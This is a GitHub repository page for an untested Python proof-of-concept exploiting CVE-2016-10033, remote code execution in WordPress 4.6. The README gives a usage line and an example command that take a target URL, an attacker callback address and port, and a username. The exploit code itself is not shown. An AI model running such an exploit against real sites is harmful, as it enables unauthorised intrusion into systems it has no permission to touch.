Skip to content
This repository has been archived by the owner on May 11, 2020. It is now read-only.

GeneralTesler/CVE-2016-10033

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commits
 
 
 
 

Repository files navigation

PoC for CVE-2016-10033

RCE against WordPress 4.6

usage:

./CVE-2016-10033.py <target site> <your ip:port> <username>

example:

./CVE-2016-10033.py http://site.com/ 1.2.3.4:4444 admin

Python port (+alterations) of https://exploitbox.io/vuln/WordPress-Exploit-4-6-RCE-CODE-EXEC-CVE-2016-10033.html

Required: Requests (pip install requests)


I haven't had the chance to test this so please let me know about your results

Releases

No releases published

Packages

No packages published